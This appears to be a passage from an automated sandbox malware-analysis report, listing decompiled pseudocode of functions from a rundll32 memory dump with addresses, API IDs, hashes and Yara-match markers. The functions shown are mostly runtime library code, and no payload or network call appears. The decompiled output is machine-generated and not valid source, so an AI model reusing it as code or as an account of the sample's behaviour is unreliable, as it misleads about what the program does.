				if ( *((intOrPtr*)(_t318 + 8)) + 0xda812030 - 1 <= 0) goto 0x2059433b;
				_t245 =  *_t318;
				 *((intOrPtr*)(_t245 + 0x30))();
				goto 0x20594341;
				_t246 = _t245 + 2;
				 *(_t326 + 0x50) = _t246;
				 *(_t326 + 0x40) = r14d;
				 *(_t326 + 0x48) = _t318;
				if (_t323[0x20] != 2) goto 0x205943cc;
				_t319 =  *_t263;
				r14d =  *(_t263 + 0x10);
				 *(_t326 + 0x68) = _t246;
				 *(_t326 + 0x70) = _t246;
				if ( *((intOrPtr*)(_t319 + 8)) + 0xda812030 - 1 <= 0) goto 0x2059438f;
				_t249 =  *_t319;
				 *((intOrPtr*)(_t249 + 0x30))();
				goto 0x20594395;
				_t250 = _t249 + 2;
				 *((long long*)(_t326 + 0x78)) = _t250;
				 *(_t326 + 0x68) = r14d;
				 *(_t326 + 0x70) = _t319;
				asm("movups xmm0, [esp+0x68]");
				asm("movups [esp+0x40], xmm0");
				asm("movsd xmm1, [esp+0x78]");
				asm("movsd [esp+0x50], xmm1");
				_t323[0x22] =  *(_t263 + 0x14);
				goto 0x20594438;
				if (_t250 != 0) goto 0x205943d8;
				E000002152152058F380(_t319, 0xda812030);
				goto 0x205943e3;
				if (_t250 != 1) goto 0x205943e6;
				E000002152152058FD30(_t319, 0xda812030);
				 *_t263 = _t250;
				if ( *(_t326 + 0x50) == 1) goto 0x205943f7;
				goto 0x2059442c;
				_t191 =  *(_t326 + 0x48);
				 *(_t263 + 0x10) = _t191 * 0x3e8 +  *(_t326 + 0x40);
				 *(_t263 + 0x14) = _t323[0x22];
				asm("lock inc esp");
				if (0 == 1) goto 0x2059448f;
				goto 0x2059412a;
				if (_t139 != 0) goto 0x20594460;
				if (r14d != 0x102) goto 0x20594525;
				goto 0x2059412a;
				r14d = 0;
				if (_t323[0x20] == 1) goto 0x20594130;
				 *(_t314 + 0x38) = r14d;
				asm("lock xadd [edi+0x34], eax");
				if (r14d != 0) goto 0x20594586;
				goto 0x20594130;
				_t323[4] = _t314;
				r9d = _t323[0x22];
				 *((intOrPtr*)(_t263 + 0x28))();
				_t230 =  *(__r8 + 0x50);
				if ( *(__r8 + 0x50) <= 0) goto 0x205944e5;
				 *(__r8 + 0x50) = 0;
				E00000215215205D1628( &(_t323[0xa]), __r8 + 0x58);
				E00000215215205D1628(_t323 - 0x50,  &(_t323[0xa]));
				_t252 = _t323 - 0x50;
				 *((long long*)(_t326 + 0x58)) = _t252;
				E00000215215205D1770(_t184, _t191,  *(_t326 + 0x40) *  *(_t326 + 0x48) >> 0x20, _t230, _t252, _t263, _t323 - 0x50,  &(_t323[0xa]), _t314, _t250, _t326 + 0x60);
				 *((long long*)(_t323 - 0x40)) = _t252;
				 *((long long*)(_t323 - 0x38)) = _t252;
				 *((long long*)(_t323 - 0x30)) = _t252;
				asm("movups xmm0, [ebp-0x40]");
				asm("inc ecx");
				asm("movsd xmm1, [ebp-0x30]");
				asm("repne inc ecx");
				asm("lock xadd [edi+0x30], ecx");
				if ((_t191 | 0xffffffff) != 1) goto 0x2059451d;
				E0000021521520593DF0(_t252, _t263, _t314,  &(_t323[0xa]));
				_t253 = _t346;
				goto 0x2059462b;
				E000002152152058F380(_t314,  &(_t323[0xa]));
				_t264 = _t253;
				 *(_t323 - 0x80) = _t253;
				 *(_t323 - 0x78) = _t253;
				if ( *((intOrPtr*)(_t264 + 8)) + 0xda812030 - 1 <= 0) goto 0x2059455d;
				 *((intOrPtr*)( *_t264 + 0x30))();
				goto 0x20594563;
				 *((long long*)(_t323 - 0x70)) = 0x4d54ee85da812032;
				 *(_t323 - 0x80) = r14d;
				 *(_t323 - 0x78) = _t264;
				asm("movups xmm0, [ebp-0x80]");
				asm("movsd xmm1, [ebp-0x70]");
				goto 0x2059461f;
				_t115 = _t314 + 0x38;
				r15d =  *_t115;
				 *_t115 = r15d;
				if (r15d != 0) goto 0x20594608;
				r9d = 0;
				r8d = 0;
				if (PostQueuedCompletionStatus(??, ??, ??, ??) != 0) goto 0x20594608;
				_t176 = GetLastError();
				E000002152152058F380( *((intOrPtr*)(_t314 + 0x28)),  &(_t323[0xa]));
				 *(_t323 - 0x68) = 0x4d54ee85da812032;
				 *((long long*)(_t323 - 0x60)) = 0x4d54ee85da812032;
				if ( *0x4D54EE85DA81203A + 0xda812030 - 1 <= 0) goto 0x205945e4;
				 *((intOrPtr*)( *((intOrPtr*)(0x4d54ee85da812032)) + 0x30))();
				goto 0x205945e9;
				 *((long long*)(_t323 - 0x58)) = 0xda812030;
				 *(_t323 - 0x68) = _t176;
				 *((long long*)(_t323 - 0x60)) = 0x4d54ee85da812032;
				asm("movups xmm0, [ebp-0x68]");
				asm("movsd xmm1, [ebp-0x58]");
				goto 0x2059461f;
				 *((long long*)(_t323 - 0x28)) = 0xda812030;
				 *((long long*)(_t323 - 0x20)) = 0x4d54ee85da812032;
				 *(_t323 - 0x18) = _t344;
				asm("movups xmm0, [ebp-0x28]");
				asm("movsd xmm1, [ebp-0x18]");
				asm("inc ecx");
				asm("repne inc ecx");
				return 0;
			}






































                0x215205940f0
                0x215205940ff
                0x21520594104
                0x2152059410b
                0x21520594113
                0x21520594121
                0x21520594124
                0x2152059412a
                0x21520594133
                0x21520594139
                0x2152059413f
                0x21520594143
                0x2152059414a
                0x21520594150
                0x21520594154
                0x21520594157
                0x2152059415d
                0x21520594167
                0x21520594169
                0x21520594171
                0x21520594173
                0x21520594177
                0x21520594179
                0x21520594185
                0x2152059418a
                0x21520594191
                0x21520594198
                0x215205941a2
                0x215205941bb
                0x215205941c5
                0x215205941cf
                0x215205941d9
                0x215205941e0
                0x215205941ea
                0x215205941f8
                0x21520594204
                0x2152059420b
                0x21520594219
                0x2152059421e
                0x21520594223
                0x21520594228
                0x2152059422b
                0x2152059423a
                0x21520594241
                0x2152059424c
                0x2152059424e
                0x21520594252
                0x2152059425f
                0x21520594263
                0x21520594268
                0x2152059426e
                0x21520594272
                0x21520594276
                0x2152059427a
                0x21520594286
                0x21520594295
                0x2152059429a
                0x215205942a0
                0x215205942a7
                0x215205942ae
                0x215205942b5
                0x215205942be
                0x215205942d9
                0x215205942e7
                0x215205942ea
                0x215205942f2
                0x215205942f8
                0x215205942fd
                0x21520594302
                0x21520594307
                0x21520594321
                0x21520594323
                0x2152059432c
                0x21520594339
                0x21520594344
                0x21520594348
                0x2152059434d
                0x21520594352
                0x2152059435f
                0x21520594361
                0x21520594364
                0x2152059436a
                0x2152059436f
                0x2152059437f
                0x21520594381
                0x2152059438a
                0x2152059438d
                0x21520594398
                0x2152059439c
                0x215205943a1
                0x215205943a6
                0x215205943ab
                0x215205943b0
                0x215205943b5
                0x215205943bb
                0x215205943c4
                0x215205943ca
                0x215205943cf
                0x215205943d1
                0x215205943d6
                0x215205943dc
                0x215205943de
                0x215205943e6
                0x215205943ef
                0x215205943f5
                0x21520594420
                0x2152059442c
                0x21520594435
                0x2152059443a
                0x21520594443
                0x21520594445
                0x2152059444c
                0x21520594455
                0x2152059445b
                0x21520594468
                0x2152059446e
                0x21520594477
                0x2152059447d
                0x21520594484
                0x2152059448a
                0x2152059448f
                0x21520594493
                0x215205944a5
                0x215205944a8
                0x215205944ad
                0x215205944af
                0x215205944bf
                0x215205944cd
                0x215205944d2
                0x215205944d6
                0x215205944df
                0x215205944e7
                0x215205944eb
                0x215205944ef
                0x215205944f3
                0x215205944f7
                0x215205944fc
                0x21520594501
                0x2152059450b
                0x21520594513
                0x21520594518
                0x2152059451d
                0x21520594520
                0x21520594525
                0x2152059452a
                0x2152059452f
                0x21520594533
                0x2152059454c
                0x21520594557
                0x2152059455b
                0x2152059456a
                0x2152059456e
                0x21520594572
                0x21520594576
                0x2152059457a
                0x21520594581
                0x21520594586
                0x21520594586
                0x21520594586
                0x2152059458d
                0x2152059458f
                0x21520594592
                0x215205945a3
                0x215205945a5
                0x215205945ad
                0x215205945b7
                0x215205945bb
                0x215205945d4
                0x215205945de
                0x215205945e2
                0x215205945f0
                0x215205945f4
                0x215205945f7
                0x215205945fb
                0x215205945ff
                0x21520594606
                0x2152059460a
                0x2152059460e
                0x21520594612
                0x21520594616
                0x2152059461a
                0x2152059461f
                0x21520594624
                0x21520594645

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Exception$ErrorLast$CompletionCopyCriticalQueuedSectionStatus$EnterLeavePostPtr::_Ptr_baseRethrowTimerWaitable
                • String ID:
                • API String ID: 2067398983-0
                • Opcode ID: 5759055dd755c935cddb1a82f18bdde7b458cca11cde4f6942d2d2c6e03ee8bf
                • Instruction ID: e65f2a5b72853cd3a6c5e947952f534263476ef140f605a0e34ea0cf89833d34
                • Opcode Fuzzy Hash: 5759055dd755c935cddb1a82f18bdde7b458cca11cde4f6942d2d2c6e03ee8bf
                • Instruction Fuzzy Hash: 4FF17873702BA4CBEB648F25E8847AE73A4FB98784F144125DE4A97B58DF38C495CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215206120E8 Relevance: 10.7, APIs: 7, Instructions: 174COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000215215206120E8(void* __ecx, void* __edx, long long __rcx, intOrPtr* __rdx, void* __r8, void* __r9) {
				signed int _v72;
				int _v80;
				int _v84;
				signed int _v88;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				int _t61;
				intOrPtr _t62;
				void* _t74;
				intOrPtr _t84;
				intOrPtr _t86;
				void* _t92;
				signed long long _t119;
				signed long long _t120;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t123;
				intOrPtr* _t124;
				intOrPtr* _t125;
				signed long long _t127;
				void* _t128;
				intOrPtr* _t129;
				signed long long _t137;
				signed long long _t139;
				void* _t150;
				signed long long _t151;
				void* _t153;
				void* _t161;
				long long _t162;
				intOrPtr* _t164;

				_t161 = __r9;
				_t144 = __rdx;
				_t130 = __rcx;
				_t74 = __ecx;
				_t119 =  *0x2067c720; // 0xca1645d940e
				_t120 = _t119 ^ _t153 - 0x00000040;
				_v72 = _t120;
				_t150 = __r8;
				_t164 = __rdx;
				_t162 = __rcx;
				E000002152152060C334(_t120, _t128, __rcx, __rdx, __r9);
				_t151 = _t120;
				_v88 = _t120;
				_v80 = 0;
				E000002152152060C334(_t120, _t128, _t130, __rdx, __r9);
				r12d = 0;
				_t5 = _t151 + 0xa0; // 0xa0
				_t129 = _t5;
				 *((long long*)(_t120 + 0x3a0)) =  &_v88;
				_t121 = _t162 + 0x80;
				 *((long long*)(_t151 + 0x98)) = _t162;
				 *_t129 = _t121;
				if (_t121 == 0) goto 0x2061216f;
				if ( *_t121 == r12w) goto 0x2061216f;
				_t84 =  *0x20635120; // 0x17
				E000002152152061205C(_t84 - 1, _t129, 0x20634fb0, __r8, _t151, _t153, _t129);
				_v88 = r12d;
				_t122 =  *((intOrPtr*)(_t151 + 0x98));
				if (_t122 == 0) goto 0x206121f8;
				if ( *_t122 == r12w) goto 0x206121f8;
				_t123 =  *_t129;
				if (_t123 == 0) goto 0x2061219e;
				if ( *_t123 == r12w) goto 0x2061219e;
				E0000021521520611A08(_t74, _t84 - 1, _t123, _t129,  &_v88, _t144, _t129, __r9);
				goto 0x206121a7;
				E0000021521520611AD8(_t74, _t84 - 1, _t123, _t129,  &_v88, _t144, _t129);
				if (_v88 != r12d) goto 0x2061226e;
				_t86 =  *0x20634fa0; // 0x41
				_t14 = _t151 + 0x98; // 0x98
				if (E000002152152061205C(_t86 - 1, _t129, 0x20634b90, __r8, _t151, _t153, _t14) == 0) goto 0x20612264;
				_t124 =  *_t129;
				if (_t124 == 0) goto 0x206121ed;
				if ( *_t124 == r12w) goto 0x206121ed;
				E0000021521520611A08(_t74, _t86 - 1, _t124, _t129,  &_v88, _t144, _t14, __r9);
				goto 0x20612264;
				_t137 =  &_v88;
				E0000021521520611AD8(_t74, _t86 - 1, _t124, _t129, _t137, _t144, _t14);
				goto 0x20612264;
				_t125 =  *_t129;
				if (_t125 == 0) goto 0x20612251;
				if ( *_t125 == r12w) goto 0x20612251;
				E000002152152060C334(_t125, _t129, _t137, _t144, __r9);
				_t139 = (_t137 | 0xffffffff) + 1;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t125 + 0xa0)) + _t139 * 2)) != r12w) goto 0x20612219;
				 *(_t125 + 0xb4) = r12d & 0xffffff00 | _t139 == 0x00000003;
				EnumSystemLocalesW(??, ??);
				if ((_v88 & 0x00000004) != 0) goto 0x20612264;
				_v88 = r12d;
				goto 0x20612264;
				_v88 = 0x104;
				_t61 = GetUserDefaultLCID();
				_v80 = _t61;
				_v84 = _t61;
				if (_v88 == r12d) goto 0x20612358;
				_t127 = _t162 + 0x100;
				asm("dec eax");
				_t62 = E0000021521520611F00(_t129, 0x2152061191c & _t127,  &_v88, _t151);
				if (_t62 == 0) goto 0x20612358;
				_t34 = _t127 - 0xfde8; // -65000
				if (_t34 - 1 <= 0) goto 0x20612358;
				if (IsValidCodePage(??) == 0) goto 0x20612358;
				if (IsValidLocale(??, ??) == 0) goto 0x20612358;
				if (_t164 == 0) goto 0x206122cf;
				 *_t164 = _t62;
				_t37 = _t151 + 0x2f0; // 0x2f0
				r9d = 0;
				_t38 = _t161 + 0x55; // 0x55
				_t92 = _t38;
				r8d = _t92;
				E000002152152060CE80(_v84, _t164, _t129, 0x2152061191c & _t127, _t37, _t150, _t151, _t153);
				if (_t150 == 0) goto 0x20612351;
				r9d = 0;
				r8d = _t92;
				E000002152152060CE80(_v84, _t150, _t129, 0x2152061191c & _t127, _t150 + 0x120, _t150, _t151, _t153);
				r9d = 0x40;
				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x20612358;
				r9d = 0x40;
				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x20612358;
				_t45 = _t151 - 0x36; // 0xa
				r9d = _t45;
				_t46 = _t151 - 0x30; // 0x10
				r8d = _t46;
				E0000021521520616E28(_t62);
				goto 0x2061235a;
				return E00000215215205F59D0(_t62, _v72 ^ _t153 - 0x00000040, _t150 + 0x100, _t161);
			}



































                0x215206120e8
                0x215206120e8
                0x215206120e8
                0x215206120e8
                0x215206120fa
                0x21520612101
                0x21520612104
                0x21520612108
                0x2152061210b
                0x2152061210e
                0x21520612111
                0x21520612116
                0x2152061211b
                0x2152061211f
                0x21520612122
                0x2152061212b
                0x2152061212e
                0x2152061212e
                0x21520612135
                0x2152061213c
                0x21520612143
                0x2152061214a
                0x21520612150
                0x21520612156
                0x21520612158
                0x2152061216a
                0x2152061216f
                0x21520612173
                0x2152061217d
                0x21520612183
                0x21520612185
                0x2152061218b
                0x21520612191
                0x21520612197
                0x2152061219c
                0x215206121a2
                0x215206121ab
                0x215206121b1
                0x215206121b7
                0x215206121ce
                0x215206121d4
                0x215206121da
                0x215206121e0
                0x215206121e6
                0x215206121eb
                0x215206121ed
                0x215206121f1
                0x215206121f6
                0x215206121f8
                0x215206121fe
                0x21520612204
                0x21520612206
                0x21520612219
                0x21520612221
                0x21520612234
                0x2152061223f
                0x21520612249
                0x2152061224b
                0x2152061224f
                0x21520612251
                0x21520612258
                0x2152061225e
                0x21520612261
                0x21520612268
                0x2152061226e
                0x2152061227c
                0x21520612282
                0x2152061228b
                0x21520612291
                0x2152061229a
                0x215206122ab
                0x215206122c1
                0x215206122ca
                0x215206122cc
                0x215206122d2
                0x215206122d9
                0x215206122dc
                0x215206122dc
                0x215206122e0
                0x215206122e3
                0x215206122eb
                0x215206122f7
                0x215206122fa
                0x215206122fd
                0x2152061230a
                0x2152061231d
                0x21520612329
                0x21520612339
                0x21520612344
                0x21520612344
                0x21520612348
                0x21520612348
                0x2152061234c
                0x21520612356
                0x21520612374

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLastLocale$CodeInfoPageValid$DefaultEnumLocalesProcessSystemUserabort
                • String ID:
                • API String ID: 3941709727-0
                • Opcode ID: d7299cf76eedf279815c05bbd91bebbd38343e6a9d947d762e7082f754918e1b
                • Instruction ID: 4323258230d7d594ec8703db8d740964a6fdf50979f6c140ca66b6d5c422c627
                • Opcode Fuzzy Hash: d7299cf76eedf279815c05bbd91bebbd38343e6a9d947d762e7082f754918e1b
                • Instruction Fuzzy Hash: 9871AA33702B61CAFF34DB60D8497ECA3A1BFA4B44F6441A58E1957788EB38E955CB10
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E59AC Relevance: 9.2, APIs: 6, Instructions: 236COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 100%
                			E00007FFA7FFA535E59AC(intOrPtr* __rax, void* __rcx, void* __rdx) {
				void* _t3;
				void* _t4;

				if (__rcx != 0) goto 0x535e59dd;
				_t3 = E00007FFA7FFA535E8380(__rax);
				 *__rax =  *__rax - _t3;
				 *0x8DE81888C48348D9 =  *((intOrPtr*)(0x8de81888c48348d9)) + _t4;
				return _t3;
			}





                0x7ffa535e59c0
                0x7ffa535e59c2
                0x7ffa535e59d0
                0x7ffa535e59d2
                0x7ffa535e59dc

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                • String ID:
                • API String ID: 1405656091-0
                • Opcode ID: 51c102ac9c2419231c36bf96dfe509cc6b16db95cb78000b505dd5ce6fe17035
                • Instruction ID: 6a254501618ceb464c2463a5cf7c6ddc1d39466bc1bcfdd50d903b4257d67876
                • Opcode Fuzzy Hash: 51c102ac9c2419231c36bf96dfe509cc6b16db95cb78000b505dd5ce6fe17035
                • Instruction Fuzzy Hash: 6A81D8B2B14B464FEB589F34C9513B923AAEF85788F08E475DA0D9A785EF3CE4009700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215206116FC Relevance: 9.2, APIs: 6, Instructions: 208COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 77%
                			E00000215215206116FC(void* __ecx, void* __edx, long long __rbx, intOrPtr __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, void* __r8, signed int __r9) {
				intOrPtr _t36;
				void* _t48;
				void* _t81;
				intOrPtr* _t82;
				intOrPtr* _t85;
				intOrPtr* _t87;
				intOrPtr* _t105;
				intOrPtr* _t109;
				long long _t112;
				void* _t113;
				void* _t115;
				signed long long _t127;
				void* _t128;
				void* _t129;
				void* _t131;
				intOrPtr _t132;
				int _t134;
				intOrPtr* _t135;

				_t48 = __ecx;
				_t81 = _t115;
				 *((long long*)(_t81 + 8)) = __rbx;
				 *((long long*)(_t81 + 0x10)) = _t112;
				 *((long long*)(_t81 + 0x18)) = __rsi;
				 *((long long*)(_t81 + 0x20)) = __rdi;
				_t113 = __r8;
				_t109 = __rdx;
				_t132 = __rcx;
				E000002152152060C334(_t81, __rbx, __rcx, __rdx, __r9);
				r12d = 0;
				_t5 = _t81 + 0x98; // 0x98
				_t87 = _t5;
				_t82 = _t132 + 0x80;
				 *((intOrPtr*)(_t87 + 0x10)) = r12d;
				_t8 = _t87 + 0x258; // 0x2f0
				_t135 = _t8;
				 *_t87 = _t132;
				_t9 = _t87 + 8; // 0xa0
				_t105 = _t9;
				 *_t135 = r12w;
				 *_t105 = _t82;
				if ( *_t82 == r12w) goto 0x2061176b;
				_t10 = _t129 + 0x16; // 0x16
				E0000021521520611660(_t10, _t87, 0x20634fb0, _t105, __rdx, _t105);
				if ( *((intOrPtr*)( *_t87)) == r12w) goto 0x206117c4;
				if ( *((intOrPtr*)( *_t105)) == r12w) goto 0x20611787;
				E0000021521520610F38(_t87, _t87, _t105, __r9);
				goto 0x2061178c;
				E0000021521520611008(_t87, _t87, _t105, __r9);
				if ( *((intOrPtr*)(_t87 + 0x10)) != r12d) goto 0x206117d3;
				if (E0000021521520611660(0x40, _t87, 0x20634b90, _t105, _t109, _t87) == 0) goto 0x206117c9;
				_t85 =  *_t105;
				if ( *_t85 == r12w) goto 0x206117bd;
				E0000021521520610F38(_t87, _t87, _t87, __r9);
				goto 0x206117c9;
				E0000021521520611008(_t87, _t87, _t87, __r9);
				goto 0x206117c9;
				E0000021521520610E90(_t48,  *_t85 - r12w, _t87, _t87, _t109, _t87, __r9);
				if ( *((intOrPtr*)(_t87 + 0x10)) == r12d) goto 0x206118e3;
				_t36 = E0000021521520611544(_t87, _t132 + 0x100, _t87, _t109, __r9);
				if (_t36 == 0) goto 0x206118e3;
				_t14 = _t85 - 0xfde8; // -65000
				if (_t14 - 1 <= 0) goto 0x206118e3;
				if (IsValidCodePage(_t134) == 0) goto 0x206118e3;
				if (_t109 == 0) goto 0x20611813;
				 *_t109 = _t36;
				if (_t113 == 0) goto 0x206118dc;
				_t110 = _t113 + 0x120;
				 *((intOrPtr*)(_t113 + 0x120)) = r12w;
				_t127 = (__r9 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(_t135 + _t127 * 2)) != r12w) goto 0x2061182b;
				_t128 = _t127 + 1;
				if (E000002152152060FCBC(0x55, _t85, _t87, _t113 + 0x120, _t87, _t128) != 0) goto 0x20611904;
				_t18 = _t85 + 0x40; // 0x40
				r9d = _t18;
				if (E000002152152060CB80(0x1001, E000002152152060FCBC(0x55, _t85, _t87, _t113 + 0x120, _t87, _t128), _t87, _t113 + 0x120, _t105, _t113 + 0x120, _t113, _t113, _t131, _t129) == 0) goto 0x206118e3;
				_t106 = _t113 + 0x80;
				r9d = 0x40;
				if (E000002152152060CB80(0x1002, E000002152152060CB80(0x1001, E000002152152060FCBC(0x55, _t85, _t87, _t113 + 0x120, _t87, _t128), _t87, _t113 + 0x120, _t105, _t113 + 0x120, _t113, _t113, _t131, _t129), _t87, _t110, _t113 + 0x80, _t110, _t113, _t113 + 0x80) == 0) goto 0x206118e3;
				E0000021521520619EA0(0x5f, _t113 + 0x80, _t128);
				if (_t85 != 0) goto 0x206118ab;
				_t20 = _t85 + 0x2e; // 0x2e
				E0000021521520619EA0(_t20, _t113 + 0x80, _t128);
				if (_t85 == 0) goto 0x206118c4;
				r9d = 0x40;
				_t21 = _t128 - 0x39; // 0x7
				if (E000002152152060CB80(_t21, _t85, _t87, _t110, _t106, _t110, _t113, _t106) == 0) goto 0x206118e3;
				r9d = 0xa;
				_t23 = _t128 + 6; // 0x46
				r8d = _t23;
				E0000021521520616E28(_t36);
				goto 0x206118e5;
				return 0;
			}





















                0x215206116fc
                0x215206116fc
                0x215206116ff
                0x21520611703
                0x21520611707
                0x2152061170b
                0x21520611719
                0x2152061171c
                0x2152061171f
                0x21520611722
                0x21520611727
                0x2152061172a
                0x2152061172a
                0x21520611731
                0x21520611738
                0x2152061173c
                0x2152061173c
                0x21520611743
                0x21520611746
                0x21520611746
                0x2152061174a
                0x2152061174e
                0x21520611755
                0x2152061175a
                0x21520611766
                0x21520611775
                0x2152061177e
                0x21520611780
                0x21520611785
                0x21520611787
                0x21520611790
                0x215206117a8
                0x215206117aa
                0x215206117b4
                0x215206117b6
                0x215206117bb
                0x215206117bd
                0x215206117c2
                0x215206117c4
                0x215206117cd
                0x215206117dd
                0x215206117e6
                0x215206117ec
                0x215206117f5
                0x21520611806
                0x2152061180f
                0x21520611811
                0x21520611816
                0x2152061181c
                0x21520611827
                0x2152061182b
                0x21520611833
                0x21520611835
                0x2152061184a
                0x21520611850
                0x21520611850
                0x21520611866
                0x21520611868
                0x2152061186f
                0x21520611887
                0x21520611891
                0x21520611899
                0x2152061189b
                0x215206118a1
                0x215206118a9
                0x215206118ab
                0x215206118b7
                0x215206118c2
                0x215206118c4
                0x215206118d3
                0x215206118d3
                0x215206118d7
                0x215206118e1
                0x21520611903

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLastNameTranslatewcschr$CodePageValidabort
                • String ID:
                • API String ID: 4237316620-0
                • Opcode ID: 6e0d7540de0bad719d2ec0437c96c5c6e4f161892cdc235a74008e37cab5573f
                • Instruction ID: a4fc89dab48fb37aa6f1cda6a31bda1e72f12aebb0f297036f53acc37e0fa5fe
                • Opcode Fuzzy Hash: 6e0d7540de0bad719d2ec0437c96c5c6e4f161892cdc235a74008e37cab5573f
                • Instruction Fuzzy Hash: 2D81BE37202B60C6EF70AF62D4193E9A3A5FFE4B80F6481619E494B7C9DB78E945C300
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E8054 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 65%
                			E00007FFA7FFA535E8054(void* __ecx, void* __edx, void* __esp, long long __rbx, long long __rdx, long long __rsi, void* __r8) {
				void* __rdi;
				void* _t36;
				long _t42;
				void* _t43;
				signed long long _t54;
				long long _t57;
				long long _t61;
				void* _t65;
				_Unknown_base(*)()* _t84;
				void* _t90;
				void* _t91;
				void* _t93;
				signed long long _t94;
				struct _EXCEPTION_POINTERS* _t100;

				_t44 = __ecx;
				 *((long long*)(_t93 + 0x10)) = __rbx;
				 *((long long*)(_t93 + 0x18)) = __rsi;
				_t3 = _t93 - 0x4f0; // -1288
				_t91 = _t3;
				_t94 = _t93 - 0x5f0;
				_t54 =  *0x53754140; // 0x3c63485c5c92
				 *(_t91 + 0x4e0) = _t54 ^ _t94;
				if (_t65 == 0xffffffff) goto 0x535e8093;
				E00007FFA7FFA535E3724(_t36);
				_t5 = _t94 + 0x70; // 0x58
				r8d = 0x98;
				E00007FFA7FFA535E3F50(__ecx, __edx, r8d, __esp, _t5, 0, _t84, __r8);
				_t6 = _t91 + 0x10; // -1272
				r8d = 0x4d0;
				E00007FFA7FFA535E3F50(_t44, __edx, r8d, __esp, _t6, 0, _t84, __r8);
				_t7 = _t94 + 0x70; // 0x58
				 *((long long*)(_t94 + 0x48)) = _t7;
				_t10 = _t91 + 0x10; // -1272
				_t57 = _t10;
				 *((long long*)(_t94 + 0x50)) = _t57;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t57 == 0) goto 0x535e8126;
				 *(_t94 + 0x38) =  *(_t94 + 0x38) & 0x00000000;
				_t16 = _t94 + 0x60; // 0x48
				 *((long long*)(_t94 + 0x30)) = _t16;
				_t19 = _t94 + 0x58; // 0x40
				 *((long long*)(_t94 + 0x28)) = _t19;
				_t21 = _t91 + 0x10; // -1272
				 *((long long*)(_t94 + 0x20)) = _t21;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t91 + 0x108)) =  *((intOrPtr*)(_t91 + 0x508));
				_t25 = _t91 + 0x508; // 0x0
				 *((long long*)(_t94 + 0x70)) = __rdx;
				 *((long long*)(_t91 + 0xa8)) = _t25 + 8;
				_t61 =  *((intOrPtr*)(_t91 + 0x508));
				 *((long long*)(_t91 - 0x80)) = _t61;
				 *(_t94 + 0x74) = _t84;
				IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t84, _t90);
				_t42 = UnhandledExceptionFilter(_t100);
				if (_t61 != 0) goto 0x535e8188;
				if (_t61 != 0) goto 0x535e8188;
				if (_t65 == 0xffffffff) goto 0x535e8188;
				_t43 = E00007FFA7FFA535E3724(_t42);
				E00007FFA7FFA535F51E0();
				return _t43;
			}

















                0x7ffa535e8054
                0x7ffa535e8054
                0x7ffa535e8059
                0x7ffa535e8062
                0x7ffa535e8062
                0x7ffa535e806a
                0x7ffa535e8071
                0x7ffa535e807b
                0x7ffa535e808c
                0x7ffa535e808e
                0x7ffa535e8095
                0x7ffa535e809a
                0x7ffa535e80a0
                0x7ffa535e80a7
                0x7ffa535e80ab
                0x7ffa535e80b1
                0x7ffa535e80b6
                0x7ffa535e80bb
                0x7ffa535e80c4
                0x7ffa535e80c4
                0x7ffa535e80c8
                0x7ffa535e80cd
                0x7ffa535e80e2
                0x7ffa535e80e5
                0x7ffa535e80ee
                0x7ffa535e80f0
                0x7ffa535e80f6
                0x7ffa535e8103
                0x7ffa535e810b
                0x7ffa535e8110
                0x7ffa535e8115
                0x7ffa535e8119
                0x7ffa535e8120
                0x7ffa535e812d
                0x7ffa535e8134
                0x7ffa535e813f
                0x7ffa535e8143
                0x7ffa535e814a
                0x7ffa535e8151
                0x7ffa535e8155
                0x7ffa535e8159
                0x7ffa535e8163
                0x7ffa535e816e
                0x7ffa535e8176
